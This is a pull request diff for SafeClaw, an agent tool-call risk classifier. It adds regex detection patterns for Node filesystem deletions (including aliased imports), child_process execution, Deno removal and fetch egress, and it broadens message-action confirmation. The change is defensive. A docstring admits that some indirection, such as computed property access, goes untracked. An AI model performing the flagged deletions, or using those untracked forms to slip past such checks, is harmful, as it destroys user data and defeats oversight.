### PR TITLE
feat(engine): classify v2026.6.8 message actions, memory/skill/media, code-mode, MCP

### DIFF
--- a/safeclaw-service/safeclaw/api/routes.py
+++ b/safeclaw-service/safeclaw/api/routes.py
@@ -219,7 +219,12 @@ async def evaluate_tool_call(request: ToolCallRequest, req: Request) -> Decision
     # (audit logging, session tracking, rate limit counting, etc.). Return a
     # classification-only response instead.
     if request.dryRun:
-        classified = engine.action_classifier.classify(request.toolName, sanitized_params)
+        classified = engine.classifier.classify(
+            request.toolName,
+            sanitized_params,
+            tool_kind=request.toolKind,
+            tool_input_kind=request.toolInputKind,
+        )
         return DecisionResponse(
             block=False,
             reason=f"dry-run: classified as {classified.ontology_class} ({classified.risk_level})",

--- a/safeclaw-service/safeclaw/constraints/action_classifier.py
+++ b/safeclaw-service/safeclaw/constraints/action_classifier.py
@@ -136,10 +136,21 @@ _SHELL_TOOLS = {"exec", "bash", "shell"}
 # Dangerous JS/TS operations in code-mode bodies that shell patterns miss (#322).
 # Matched against the RAW source (quotes intact), so embedded command strings
 # like execSync("git push --force") are also visible to SHELL_PATTERNS.
+# Node fs removal verbs (the distinctive method names).
+_FS_DELETE_VERBS = r"(?:rmSync|rm|unlinkSync|unlink|rmdirSync|rmdir)"
+
 JS_PATTERNS = [
-    # fs / fs.promises / fsp removal, plus Deno/Bun equivalents.
+    # Member access: fs / fs.promises / fsp .<delete>(
     (
-        r"\b(?:fs\.promises|fsp|fs)\.(?:rmSync|rm|unlinkSync|unlink|rmdirSync|rmdir)\s*\(",
+        rf"\b(?:fs\.promises|fsp|fs)\.{_FS_DELETE_VERBS}\s*\(",
+        "DeleteFile",
+        "CriticalRisk",
+        False,
+        "LocalOnly",
+    ),
+    # Inline require chain: require("fs"|"node:fs"|"fs/promises").<delete>(
+    (
+        rf"""require\(\s*['"](?:node:)?fs(?:/promises)?['"]\s*\)\s*\.\s*{_FS_DELETE_VERBS}\s*\(""",
         "DeleteFile",
         "CriticalRisk",
         False,
@@ -161,6 +172,24 @@ JS_PATTERNS = [
     ),
     # JS-native network egress (no curl/wget analogue).
     (r"\bfetch\s*\(", "NetworkRequest", "MediumRisk", True, "ExternalWorld"),
+]
+
+# Detect a Node fs import in any form (require or ES import, incl. node:/promises),
+# so destructured/aliased removal calls (`const {rm}=require("fs"); rm(...)`) can
+# be treated as deletes even when split from their import by `;` (#322 follow-up).
+_FS_IMPORT_RE = re.compile(
+    r"""(?:require\(\s*['"](?:node:)?fs(?:/promises)?['"]\s*\)"""
+    r"""|(?:from|import)\s+['"](?:node:)?fs(?:/promises)?['"])"""
+)
+# When fs is imported, a bare removal call is a filesystem delete.
+_FS_BARE_DELETE_PATTERNS = [
+    (
+        rf"\b{_FS_DELETE_VERBS}\s*\(",
+        "DeleteFile",
+        "CriticalRisk",
+        False,
+        "LocalOnly",
+    ),
 ]
 
 # MCP / dynamically-exposed plugin tools use a namespaced name (#325).
@@ -232,10 +261,20 @@ class ActionClassifier:
         )
         return self._enrich_from_ontology(action)
 
+    @staticmethod
+    def _as_bool(value: object) -> bool:
+        """Interpret a JSON-ish flag as bool. Crucially, the STRING "false"
+        (and other falsey strings) must be False — `bool("false")` is True."""
+        if isinstance(value, bool):
+            return value
+        if isinstance(value, str):
+            return value.strip().lower() in ("true", "1", "yes", "on")
+        return bool(value)
+
     def _classify_message(self, params: dict) -> ClassifiedAction:
         """Classify a `message` tool call by its action / channel context (#318)."""
         action = str(params.get("action") or "send").strip().lower()
-        cross_context = bool(params.get("crossContext"))
+        cross_context = self._as_bool(params.get("crossContext"))
 
         if action in _MESSAGE_CREATE_ACTIONS:
             cls, risk, scope = "CreateChannel", "HighRisk", "ExternalWorld"
@@ -329,7 +368,15 @@ class ActionClassifier:
         # embedded command string like execSync("git push --force") is visible)
         # and also apply JS/TS dangerous-op patterns. Plain shell strips quoted
         # data first to avoid false positives from quoted arguments. (#322)
-        patterns = (SHELL_PATTERNS + JS_PATTERNS) if code_mode else SHELL_PATTERNS
+        if code_mode:
+            patterns = SHELL_PATTERNS + JS_PATTERNS
+            # If the body imports Node fs in any form, a bare (destructured/
+            # aliased) removal call is a filesystem delete — checked over the
+            # WHOLE command since `;` may split the import from the call.
+            if _FS_IMPORT_RE.search(command):
+                patterns = patterns + _FS_BARE_DELETE_PATTERNS
+        else:
+            patterns = SHELL_PATTERNS
 
         for sub_cmd in sub_commands:
             if code_mode:

--- a/safeclaw-service/safeclaw/constraints/action_classifier.py
+++ b/safeclaw-service/safeclaw/constraints/action_classifier.py
@@ -74,8 +74,16 @@ TOOL_MAPPINGS = {
     "apply_patch": ("EditFile", "MediumRisk", True, "LocalOnly"),
     "web_fetch": ("WebFetch", "MediumRisk", True, "ExternalWorld"),
     "web_search": ("WebSearch", "LowRisk", True, "ExternalWorld"),
-    "message": ("SendMessage", "HighRisk", False, "ExternalWorld"),
+    # `message` is handled by _classify_message (action/channel-aware, #318).
     "browser": ("BrowserAction", "MediumRisk", True, "ExternalWorld"),
+    # Memory / skill / media tools (v2026.6.8, #319)
+    "memory_store": ("MemoryWrite", "HighRisk", False, "SharedState"),
+    "memory_recall": ("MemoryRead", "LowRisk", True, "LocalOnly"),
+    "skill_workshop": ("SkillAuthor", "HighRisk", False, "SharedState"),
+    "image": ("GenerateMedia", "MediumRisk", True, "ExternalWorld"),
+    "image_generate": ("GenerateMedia", "MediumRisk", True, "ExternalWorld"),
+    "music_generate": ("GenerateMedia", "MediumRisk", True, "ExternalWorld"),
+    "tts": ("GenerateMedia", "MediumRisk", True, "ExternalWorld"),
     "glob": ("ListFiles", "LowRisk", True, "LocalOnly"),
     "grep": ("SearchFiles", "LowRisk", True, "LocalOnly"),
     "find": ("ListFiles", "LowRisk", True, "LocalOnly"),
@@ -88,6 +96,66 @@ TOOL_MAPPINGS = {
     "trash": ("DeleteFile", "HighRisk", False, "LocalOnly"),
 }
 
+# --- message tool action classification (#318) ---
+# Real OpenClaw v2026.6.8 `message` action names (CHANNEL_MESSAGE_ACTION_NAMES).
+# Creating a new delivery surface.
+_MESSAGE_CREATE_ACTIONS = {
+    "channel-create",
+    "category-create",
+    "topic-create",
+    "thread-create",
+    "event-create",
+}
+# Broadcasting to an explicit/other target — cross-context blast radius.
+_MESSAGE_BROADCAST_ACTIONS = {"broadcast"}
+# Membership / permission / destructive channel moderation.
+_MESSAGE_MODERATE_ACTIONS = {
+    "kick",
+    "ban",
+    "timeout",
+    "addparticipant",
+    "removeparticipant",
+    "leavegroup",
+    "renamegroup",
+    "setgroupicon",
+    "role-add",
+    "role-remove",
+    "permissions",
+    "channel-edit",
+    "channel-delete",
+    "channel-move",
+    "category-edit",
+    "category-delete",
+    "topic-edit",
+}
+
+# Tools whose body is code-mode source rather than a shell command line (#322).
+_CODE_MODE_TOOLS = {"sandbox_exec", "sandbox_process"}
+_SHELL_TOOLS = {"exec", "bash", "shell"}
+
+# Dangerous JS/TS operations in code-mode bodies that shell patterns miss (#322).
+# Matched against the RAW source (quotes intact), so embedded command strings
+# like execSync("git push --force") are also visible to SHELL_PATTERNS.
+JS_PATTERNS = [
+    (
+        r"\bfs\.(?:rmSync|rm|unlinkSync|unlink|rmdirSync|rmdir)\s*\(",
+        "DeleteFile",
+        "CriticalRisk",
+        False,
+        "LocalOnly",
+    ),
+    (
+        r"\b(?:child_process|execSync|spawnSync|execFileSync)\b",
+        "ExecuteCommand",
+        "HighRisk",
+        False,
+        "LocalOnly",
+    ),
+]
+
+# MCP / dynamically-exposed plugin tools use a namespaced name (#325).
+_MCP_PREFIX = "mcp__"
+
 
 class ActionClassifier:
     """Maps tool calls to ontology action classes."""
@@ -95,21 +163,56 @@ class ActionClassifier:
     def __init__(self, hierarchy: ClassHierarchy | None = None):
         self._hierarchy = hierarchy
 
-    def classify(self, tool_name: str, params: dict) -> ClassifiedAction:
-        # Shell commands need deeper inspection
-        if tool_name in ("exec", "bash", "shell"):
-            return self._classify_shell(params)
+    def classify(
+        self,
+        tool_name: str,
+        params: dict,
+        tool_kind: str = "",
+        tool_input_kind: str = "",
+    ) -> ClassifiedAction:
+        # Code-mode exec (JS/TS) and sandbox exec/process are still command
+        # execution — route them through the shell classifier (#322).
+        if (
+            tool_name in _SHELL_TOOLS
+            or tool_name in _CODE_MODE_TOOLS
+            or tool_kind == "code_mode_exec"
+        ):
+            code_mode = tool_name in _CODE_MODE_TOOLS or tool_kind == "code_mode_exec"
+            return self._classify_shell(params, tool_name=tool_name, code_mode=code_mode)
+
+        # The `message` tool is multi-action: branch on the action/channel params
+        # so channel-create and cross-context broadcasts are not seen as a plain
+        # reply (#318).
+        if tool_name == "message":
+            return self._classify_message(params)
+
+        # MCP / dynamically-exposed plugin tools have arbitrary namespaced names
+        # and can perform external writes; default to a conservative HighRisk
+        # ExternalWorld class until explicitly classified (#325).
+        if tool_name.startswith(_MCP_PREFIX):
+            return self._enrich_from_ontology(
+                ClassifiedAction(
+                    ontology_class="McpToolCall",
+                    risk_level="HighRisk",
+                    is_reversible=False,
+                    affects_scope="ExternalWorld",
+                    tool_name=tool_name,
+                    params=params,
+                )
+            )
 
         # Direct tool mapping
         if tool_name in TOOL_MAPPINGS:
             cls, risk, reversible, scope = TOOL_MAPPINGS[tool_name]
-            return ClassifiedAction(
-                ontology_class=cls,
-                risk_level=risk,
-                is_reversible=reversible,
-                affects_scope=scope,
-                tool_name=tool_name,
-                params=params,
+            return self._enrich_from_ontology(
+                ClassifiedAction(
+                    ontology_class=cls,
+                    risk_level=risk,
+                    is_reversible=reversible,
+                    affects_scope=scope,
+                    tool_name=tool_name,
+                    params=params,
+                )
             )
 
         # Unknown tool - conservative default
@@ -122,6 +225,31 @@ class ActionClassifier:
             params=params,
         )
         return self._enrich_from_ontology(action)
+
+    def _classify_message(self, params: dict) -> ClassifiedAction:
+        """Classify a `message` tool call by its action / channel context (#318)."""
+        action = str(params.get("action") or "send").strip().lower()
+        cross_context = bool(params.get("crossContext"))
+
+        if action in _MESSAGE_CREATE_ACTIONS:
+            cls, risk, scope = "CreateChannel", "HighRisk", "ExternalWorld"
+        elif cross_context or action in _MESSAGE_BROADCAST_ACTIONS:
+            cls, risk, scope = "CrossContextMessage", "CriticalRisk", "ExternalWorld"
+        elif action in _MESSAGE_MODERATE_ACTIONS:
+            cls, risk, scope = "ModerateChannel", "HighRisk", "ExternalWorld"
+        else:
+            cls, risk, scope = "SendMessage", "HighRisk", "ExternalWorld"
+
+        return self._enrich_from_ontology(
+            ClassifiedAction(
+                ontology_class=cls,
+                risk_level=risk,
+                is_reversible=False,
+                affects_scope=scope,
+                tool_name="message",
+                params=params,
+            )
+        )
 
     @staticmethod
     def _split_chain(command: str) -> list[str]:
@@ -183,7 +311,9 @@ class ActionClassifier:
         parts.append("".join(current))
         return [p.strip() for p in parts if p.strip()]
 
-    def _classify_shell(self, params: dict) -> ClassifiedAction:
+    def _classify_shell(
+        self, params: dict, tool_name: str = "exec", code_mode: bool = False
+    ) -> ClassifiedAction:
         command = params.get("command") or ""
 
         # Split on command chaining operators, respecting quoted strings
@@ -191,24 +321,31 @@ class ActionClassifier:
         highest_risk = None
         chain_classes: list[str] = []
 
+        # Code-mode bodies are source, not a shell line: scan them RAW (so an
+        # embedded command string like execSync("git push --force") is visible)
+        # and also apply JS/TS dangerous-op patterns. Plain shell strips quoted
+        # data first to avoid false positives from quoted arguments. (#322)
+        patterns = (SHELL_PATTERNS + JS_PATTERNS) if code_mode else SHELL_PATTERNS
+
         for sub_cmd in sub_commands:
-            # Strip quoted strings from each sub-command before pattern matching
-            # so that content inside quotes does not trigger false positives
-            unquoted = re.sub(r"""(["'])(?:\\.|(?!\1).)*\1""", "", sub_cmd)
-            # Expand subshell / process substitutions so their contents are
-            # also visible to pattern matching  (#23)
-            unquoted = re.sub(r"\$\(([^)]*)\)", r" \1 ", unquoted)
-            unquoted = re.sub(r"`([^`]*)`", r" \1 ", unquoted)
+            if code_mode:
+                scan = sub_cmd
+            else:
+                # Strip quoted strings, then expand subshell/process substitutions
+                # so their contents are also visible to pattern matching (#23).
+                scan = re.sub(r"""(["'])(?:\\.|(?!\1).)*\1""", "", sub_cmd)
+                scan = re.sub(r"\$\(([^)]*)\)", r" \1 ", scan)
+                scan = re.sub(r"`([^`]*)`", r" \1 ", scan)
             matched_cls: str | None = None
-            for pattern, cls, risk, reversible, scope in SHELL_PATTERNS:
-                if re.search(pattern, unquoted, re.IGNORECASE):
+            for pattern, cls, risk, reversible, scope in patterns:
+                if re.search(pattern, scan, re.IGNORECASE):
                     matched_cls = cls
                     candidate = ClassifiedAction(
                         ontology_class=cls,
                         risk_level=risk,
                         is_reversible=reversible,
                         affects_scope=scope,
-                        tool_name="exec",
+                        tool_name=tool_name,
                         params=params,
                     )
                     if highest_risk is None or RISK_ORDER.get(risk, 0) > RISK_ORDER.get(
@@ -225,13 +362,13 @@ class ActionClassifier:
             highest_risk.chain_classes = chain_classes
             return highest_risk
 
-        # Default shell command classification
+        # Default shell/code-mode command classification
         return ClassifiedAction(
             ontology_class="ExecuteCommand",
             risk_level="HighRisk",
             is_reversible=False,
             affects_scope="LocalOnly",
-            tool_name="exec",
+            tool_name=tool_name,
             params=params,
             chain_classes=chain_classes,
         )

--- a/safeclaw-service/safeclaw/constraints/action_classifier.py
+++ b/safeclaw-service/safeclaw/constraints/action_classifier.py
@@ -402,13 +402,29 @@ class ActionClassifier:
 
         for m in _FS_DESTRUCT_FROM_MODULE_RE.finditer(command):
             _collect(m.group(1) or m.group(2) or "")
-        # Destructure from a known namespace alias: `const {rmSync} = m`. Snapshot
-        # the set since _collect may add promises aliases to it during iteration.
-        for alias in tuple(ns_aliases):
-            for m in re.finditer(
-                rf"(?:const|let|var)\s*\{{([^}}]*)\}}\s*=\s*{re.escape(alias)}\b", command
-            ):
-                _collect(m.group(1))
+
+        # Propagate to a fixpoint so chains work: assignment aliases
+        # (`const p = fs` or `const p = fs.promises`, where fs is a known alias)
+        # become namespace aliases, and destructures from a known alias
+        # (`const {rm} = fs`) are collected. Aliases only grow (bounded by the
+        # identifiers in the command), so this terminates.
+        changed = True
+        while changed:
+            before = (len(ns_aliases), len(verb_aliases))
+            for alias in tuple(ns_aliases):
+                # `const X = <alias>` / `const X = <alias>.promises` — the negative
+                # lookahead rejects function-value aliases like `= fs.promises.rm`.
+                for am in re.finditer(
+                    rf"(?:const|let|var)\s+({_ID})\s*=\s*{re.escape(alias)}(?:\.promises)?(?![\w$.])",
+                    command,
+                ):
+                    ns_aliases.add(am.group(1))
+                # `const {rmSync} = <alias>`
+                for dm in re.finditer(
+                    rf"(?:const|let|var)\s*\{{([^}}]*)\}}\s*=\s*{re.escape(alias)}\b", command
+                ):
+                    _collect(dm.group(1))
+            changed = (len(ns_aliases), len(verb_aliases)) != before
 
         verbs = "|".join(_FS_VERB_SET)
         extra: list[tuple] = []

--- a/safeclaw-service/safeclaw/constraints/action_classifier.py
+++ b/safeclaw-service/safeclaw/constraints/action_classifier.py
@@ -365,9 +365,12 @@ class ActionClassifier:
         """Build DeleteFile patterns for fs removal calls reached via aliases.
 
         Covers: namespace bindings (`const m = require("fs")` / `await import`,
-        `import * as m`/default) → `m.<verb>(`; and renamed/destructured bindings
-        (`const {rmSync: del} = require("fs")`, `import {rm as nuke} from "fs"`,
-        and destructuring from a namespace alias) → bare `del(`/`nuke(`.
+        `import * as m`/default) → `m.<verb>(` and `m.promises.<verb>(`; a
+        destructured `promises` namespace (`const {promises} = require("fs")`,
+        `import {promises as p} from "node:fs"`) → `promises.<verb>(`/`p.<verb>(`;
+        and renamed/destructured delete-verb bindings (`const {rmSync: del} =
+        require("fs")`, `import {rm as nuke} from "fs"`, destructuring from a
+        namespace alias) → bare `del(`/`nuke(`.
 
         Deliberately heuristic: deeper indirection (computed property access like
         `fs["rm"+"Sync"]`, passing the function as a value) is not tracked and
@@ -388,13 +391,20 @@ class ActionClassifier:
                 halves = _DESTRUCT_RENAME_RE.split(entry, maxsplit=1)
                 orig = halves[0].strip()
                 local = halves[-1].strip() if len(halves) > 1 else orig
-                if orig in _FS_VERB_SET and re.fullmatch(_ID, local):
+                if not re.fullmatch(_ID, local):
+                    continue
+                if orig in _FS_VERB_SET:
                     verb_aliases.add(local)
+                elif orig == "promises":
+                    # The destructured fs.promises API is itself a namespace whose
+                    # members include the delete verbs (#322 follow-up).
+                    ns_aliases.add(local)
 
         for m in _FS_DESTRUCT_FROM_MODULE_RE.finditer(command):
             _collect(m.group(1) or m.group(2) or "")
-        # Destructure from a known namespace alias: `const {rmSync} = m`.
-        for alias in ns_aliases:
+        # Destructure from a known namespace alias: `const {rmSync} = m`. Snapshot
+        # the set since _collect may add promises aliases to it during iteration.
+        for alias in tuple(ns_aliases):
             for m in re.finditer(
                 rf"(?:const|let|var)\s*\{{([^}}]*)\}}\s*=\s*{re.escape(alias)}\b", command
             ):
@@ -403,9 +413,11 @@ class ActionClassifier:
         verbs = "|".join(_FS_VERB_SET)
         extra: list[tuple] = []
         for alias in ns_aliases:
+            # Allow an optional `.promises` hop so `<fsAlias>.promises.<verb>(` is
+            # caught alongside `<fsAlias>.<verb>(` and `<promisesAlias>.<verb>(`.
             extra.append(
                 (
-                    rf"\b{re.escape(alias)}\.(?:{verbs})\s*\(",
+                    rf"\b{re.escape(alias)}(?:\.promises)?\.(?:{verbs})\s*\(",
                     "DeleteFile",
                     "CriticalRisk",
                     False,

--- a/safeclaw-service/safeclaw/constraints/action_classifier.py
+++ b/safeclaw-service/safeclaw/constraints/action_classifier.py
@@ -174,23 +174,27 @@ JS_PATTERNS = [
     (r"\bfetch\s*\(", "NetworkRequest", "MediumRisk", True, "ExternalWorld"),
 ]
 
-# Detect a Node fs import in any form (require or ES import, incl. node:/promises),
-# so destructured/aliased removal calls (`const {rm}=require("fs"); rm(...)`) can
-# be treated as deletes even when split from their import by `;` (#322 follow-up).
-_FS_IMPORT_RE = re.compile(
-    r"""(?:require\(\s*['"](?:node:)?fs(?:/promises)?['"]\s*\)"""
-    r"""|(?:from|import)\s+['"](?:node:)?fs(?:/promises)?['"])"""
+# --- Lightweight fs alias/binding tracker (#322 follow-up) ---
+# Regex JS analysis can't catch every obfuscation, but renamed destructuring and
+# dynamic-import namespace aliases are common, non-adversarial forms that must
+# not bypass DeleteFile. We track three binding shapes over the whole command.
+_FS_MOD = r"""['"](?:node:)?fs(?:/promises)?['"]"""
+_FS_VERB_SET = ("rmSync", "rm", "unlinkSync", "unlink", "rmdirSync", "rmdir")
+_ID = r"[A-Za-z_$][\w$]*"
+
+# Namespace binding: `const X = require("fs")` / `= await import("fs")`,
+# `import X from "fs"`, `import * as X from "fs"`.
+_FS_NS_BINDING_RE = re.compile(
+    rf"""(?:const|let|var)\s+({_ID})\s*=\s*(?:await\s+)?(?:require|import)\(\s*{_FS_MOD}\s*\)"""
+    rf"""|import\s+(?:\*\s+as\s+)?({_ID})\s+from\s*{_FS_MOD}"""
 )
-# When fs is imported, a bare removal call is a filesystem delete.
-_FS_BARE_DELETE_PATTERNS = [
-    (
-        rf"\b{_FS_DELETE_VERBS}\s*\(",
-        "DeleteFile",
-        "CriticalRisk",
-        False,
-        "LocalOnly",
-    ),
-]
+# Destructured/named-import block from fs (require/import), OR from a known
+# namespace alias (filled in at match time). Capture the `{...}` body.
+_FS_DESTRUCT_FROM_MODULE_RE = re.compile(
+    rf"""(?:const|let|var)\s*\{{([^}}]*)\}}\s*=\s*(?:await\s+)?(?:require|import)\(\s*{_FS_MOD}\s*\)"""
+    rf"""|import\s*\{{([^}}]*)\}}\s*from\s*{_FS_MOD}"""
+)
+_DESTRUCT_RENAME_RE = re.compile(r"\s*(?::|\bas\b)\s*")
 
 # MCP / dynamically-exposed plugin tools use a namespaced name (#325).
 _MCP_PREFIX = "mcp__"
@@ -225,6 +229,20 @@ class ActionClassifier:
         if tool_name == "message":
             return self._classify_message(params)
 
+        # Direct tool mapping (Python tuple is authoritative — matches the ttl).
+        # Checked BEFORE the mcp__ prefix default so an explicit classification
+        # for a trusted `mcp__*` tool wins over the conservative default (#325).
+        if tool_name in TOOL_MAPPINGS:
+            cls, risk, reversible, scope = TOOL_MAPPINGS[tool_name]
+            return ClassifiedAction(
+                ontology_class=cls,
+                risk_level=risk,
+                is_reversible=reversible,
+                affects_scope=scope,
+                tool_name=tool_name,
+                params=params,
+            )
+
         # MCP / dynamically-exposed plugin tools have arbitrary namespaced names
         # and can perform external writes; default to a conservative HighRisk
         # ExternalWorld class until explicitly classified (#325).
@@ -234,18 +252,6 @@ class ActionClassifier:
                 risk_level="HighRisk",
                 is_reversible=False,
                 affects_scope="ExternalWorld",
-                tool_name=tool_name,
-                params=params,
-            )
-
-        # Direct tool mapping (Python tuple is authoritative — matches the ttl)
-        if tool_name in TOOL_MAPPINGS:
-            cls, risk, reversible, scope = TOOL_MAPPINGS[tool_name]
-            return ClassifiedAction(
-                ontology_class=cls,
-                risk_level=risk,
-                is_reversible=reversible,
-                affects_scope=scope,
                 tool_name=tool_name,
                 params=params,
             )
@@ -354,6 +360,63 @@ class ActionClassifier:
         parts.append("".join(current))
         return [p.strip() for p in parts if p.strip()]
 
+    @staticmethod
+    def _fs_alias_delete_patterns(command: str) -> list[tuple]:
+        """Build DeleteFile patterns for fs removal calls reached via aliases.
+
+        Covers: namespace bindings (`const m = require("fs")` / `await import`,
+        `import * as m`/default) → `m.<verb>(`; and renamed/destructured bindings
+        (`const {rmSync: del} = require("fs")`, `import {rm as nuke} from "fs"`,
+        and destructuring from a namespace alias) → bare `del(`/`nuke(`.
+
+        Deliberately heuristic: deeper indirection (computed property access like
+        `fs["rm"+"Sync"]`, passing the function as a value) is not tracked and
+        falls back to the code-mode ExecuteCommand floor. Renames of NON-delete
+        verbs are not flagged.
+        """
+        ns_aliases: set[str] = set()
+        for m in _FS_NS_BINDING_RE.finditer(command):
+            ns_aliases.add(m.group(1) or m.group(2))
+
+        verb_aliases: set[str] = set()
+
+        def _collect(block: str) -> None:
+            for entry in block.split(","):
+                entry = entry.strip()
+                if not entry:
+                    continue
+                halves = _DESTRUCT_RENAME_RE.split(entry, maxsplit=1)
+                orig = halves[0].strip()
+                local = halves[-1].strip() if len(halves) > 1 else orig
+                if orig in _FS_VERB_SET and re.fullmatch(_ID, local):
+                    verb_aliases.add(local)
+
+        for m in _FS_DESTRUCT_FROM_MODULE_RE.finditer(command):
+            _collect(m.group(1) or m.group(2) or "")
+        # Destructure from a known namespace alias: `const {rmSync} = m`.
+        for alias in ns_aliases:
+            for m in re.finditer(
+                rf"(?:const|let|var)\s*\{{([^}}]*)\}}\s*=\s*{re.escape(alias)}\b", command
+            ):
+                _collect(m.group(1))
+
+        verbs = "|".join(_FS_VERB_SET)
+        extra: list[tuple] = []
+        for alias in ns_aliases:
+            extra.append(
+                (
+                    rf"\b{re.escape(alias)}\.(?:{verbs})\s*\(",
+                    "DeleteFile",
+                    "CriticalRisk",
+                    False,
+                    "LocalOnly",
+                )
+            )
+        if verb_aliases:
+            alt = "|".join(re.escape(a) for a in verb_aliases)
+            extra.append((rf"\b(?:{alt})\s*\(", "DeleteFile", "CriticalRisk", False, "LocalOnly"))
+        return extra
+
     def _classify_shell(
         self, params: dict, tool_name: str = "exec", code_mode: bool = False
     ) -> ClassifiedAction:
@@ -369,12 +432,11 @@ class ActionClassifier:
         # and also apply JS/TS dangerous-op patterns. Plain shell strips quoted
         # data first to avoid false positives from quoted arguments. (#322)
         if code_mode:
-            patterns = SHELL_PATTERNS + JS_PATTERNS
-            # If the body imports Node fs in any form, a bare (destructured/
-            # aliased) removal call is a filesystem delete — checked over the
-            # WHOLE command since `;` may split the import from the call.
-            if _FS_IMPORT_RE.search(command):
-                patterns = patterns + _FS_BARE_DELETE_PATTERNS
+            # Add patterns derived from fs bindings in this body (namespace and
+            # renamed/destructured aliases), so deletes via aliased names are
+            # caught — checked over the WHOLE command since `;` may split a
+            # binding from its later use. (#322 follow-up)
+            patterns = SHELL_PATTERNS + JS_PATTERNS + self._fs_alias_delete_patterns(command)
         else:
             patterns = SHELL_PATTERNS
 

--- a/safeclaw-service/safeclaw/constraints/action_classifier.py
+++ b/safeclaw-service/safeclaw/constraints/action_classifier.py
@@ -137,8 +137,16 @@ _SHELL_TOOLS = {"exec", "bash", "shell"}
 # Matched against the RAW source (quotes intact), so embedded command strings
 # like execSync("git push --force") are also visible to SHELL_PATTERNS.
 JS_PATTERNS = [
+    # fs / fs.promises / fsp removal, plus Deno/Bun equivalents.
     (
-        r"\bfs\.(?:rmSync|rm|unlinkSync|unlink|rmdirSync|rmdir)\s*\(",
+        r"\b(?:fs\.promises|fsp|fs)\.(?:rmSync|rm|unlinkSync|unlink|rmdirSync|rmdir)\s*\(",
+        "DeleteFile",
+        "CriticalRisk",
+        False,
+        "LocalOnly",
+    ),
+    (
+        r"\bDeno\.(?:remove|removeSync)\s*\(",
         "DeleteFile",
         "CriticalRisk",
         False,
@@ -151,6 +159,8 @@ JS_PATTERNS = [
         False,
         "LocalOnly",
     ),
+    # JS-native network egress (no curl/wget analogue).
+    (r"\bfetch\s*\(", "NetworkRequest", "MediumRisk", True, "ExternalWorld"),
 ]
 
 # MCP / dynamically-exposed plugin tools use a namespaced name (#325).
@@ -190,29 +200,25 @@ class ActionClassifier:
         # and can perform external writes; default to a conservative HighRisk
         # ExternalWorld class until explicitly classified (#325).
         if tool_name.startswith(_MCP_PREFIX):
-            return self._enrich_from_ontology(
-                ClassifiedAction(
-                    ontology_class="McpToolCall",
-                    risk_level="HighRisk",
-                    is_reversible=False,
-                    affects_scope="ExternalWorld",
-                    tool_name=tool_name,
-                    params=params,
-                )
+            return ClassifiedAction(
+                ontology_class="McpToolCall",
+                risk_level="HighRisk",
+                is_reversible=False,
+                affects_scope="ExternalWorld",
+                tool_name=tool_name,
+                params=params,
             )
 
-        # Direct tool mapping
+        # Direct tool mapping (Python tuple is authoritative — matches the ttl)
         if tool_name in TOOL_MAPPINGS:
             cls, risk, reversible, scope = TOOL_MAPPINGS[tool_name]
-            return self._enrich_from_ontology(
-                ClassifiedAction(
-                    ontology_class=cls,
-                    risk_level=risk,
-                    is_reversible=reversible,
-                    affects_scope=scope,
-                    tool_name=tool_name,
-                    params=params,
-                )
+            return ClassifiedAction(
+                ontology_class=cls,
+                risk_level=risk,
+                is_reversible=reversible,
+                affects_scope=scope,
+                tool_name=tool_name,
+                params=params,
             )
 
         # Unknown tool - conservative default
@@ -240,15 +246,13 @@ class ActionClassifier:
         else:
             cls, risk, scope = "SendMessage", "HighRisk", "ExternalWorld"
 
-        return self._enrich_from_ontology(
-            ClassifiedAction(
-                ontology_class=cls,
-                risk_level=risk,
-                is_reversible=False,
-                affects_scope=scope,
-                tool_name="message",
-                params=params,
-            )
+        return ClassifiedAction(
+            ontology_class=cls,
+            risk_level=risk,
+            is_reversible=False,
+            affects_scope=scope,
+            tool_name="message",
+            params=params,
         )
 
     @staticmethod

--- a/safeclaw-service/safeclaw/constraints/preference_checker.py
+++ b/safeclaw-service/safeclaw/constraints/preference_checker.py
@@ -95,8 +95,15 @@ class PreferenceChecker:
                     requires_confirmation=True,
                 )
 
-        # Check send confirmation
-        if action.ontology_class == "SendMessage":
+        # Check send confirmation. Covers the whole outbound message family
+        # (#318) — channel-create / cross-context broadcast / moderation must not
+        # skip the "confirm before send" brake that a plain reply triggers.
+        if action.ontology_class in (
+            "SendMessage",
+            "CreateChannel",
+            "CrossContextMessage",
+            "ModerateChannel",
+        ):
             if prefs.confirm_before_send:
                 return PreferenceCheckResult(
                     violated=True,

--- a/safeclaw-service/safeclaw/engine/full_engine.py
+++ b/safeclaw-service/safeclaw/engine/full_engine.py
@@ -18,7 +18,7 @@ from safeclaw.audit.models import (
     PreferenceApplied,
 )
 from safeclaw.config import SafeClawConfig
-from safeclaw.constraints.action_classifier import ActionClassifier
+from safeclaw.constraints.action_classifier import ActionClassifier, ClassifiedAction
 from safeclaw.constraints.dependency_checker import DependencyChecker
 from safeclaw.constraints.message_gate import MessageGate
 from safeclaw.constraints.policy_checker import PolicyChecker
@@ -82,6 +82,12 @@ class _PendingToolResult:
     params_signature: str
     run_id: str
     action_class: str
+    # Full eval-time classification, reused on the result path so re-classifying
+    # the same call cannot drift (e.g. a code-mode exec body classifies
+    # differently without its tool_kind) and silently break the result binding.
+    risk_level: str = "MediumRisk"
+    is_reversible: bool = True
+    affects_scope: str = "LocalOnly"
 
 
 class FullEngine(SafeClawEngine):
@@ -442,6 +448,9 @@ class FullEngine(SafeClawEngine):
                 params_signature=DelegationDetector.make_signature(event.params),
                 run_id=event.run_id or "",
                 action_class=action.ontology_class,
+                risk_level=action.risk_level,
+                is_reversible=action.is_reversible,
+                affects_scope=action.affects_scope,
             )
         )
         if len(pending) > MAX_PENDING_TOOL_RESULTS_PER_SESSION:
@@ -449,10 +458,19 @@ class FullEngine(SafeClawEngine):
         while len(self._pending_tool_results) > MAX_PENDING_TOOL_RESULT_SESSIONS:
             self._pending_tool_results.popitem(last=False)
 
-    def _consume_pending_tool_result(self, event: ToolResultEvent, action) -> bool:
+    def _consume_pending_tool_result(self, event: ToolResultEvent) -> _PendingToolResult | None:
+        """Find and remove the pending entry for this result.
+
+        Matches on tool_name + params signature + owner + run_id and returns the
+        stored entry (with its eval-time classification). We deliberately do NOT
+        compare the re-classified action class: re-classifying the result event
+        can drift (a code-mode exec body classifies differently without its
+        tool_kind), which would silently break the binding and skip session-risk,
+        dependency, and rate-limit accounting for exactly the highest-risk calls.
+        """
         pending = self._pending_tool_results.get(event.session_id)
         if not pending:
-            return False
+            return None
 
         owner_id = self._tool_result_owner_id(event)
         params_signature = DelegationDetector.make_signature(event.params)
@@ -461,8 +479,6 @@ class FullEngine(SafeClawEngine):
             if candidate.tool_name != event.tool_name:
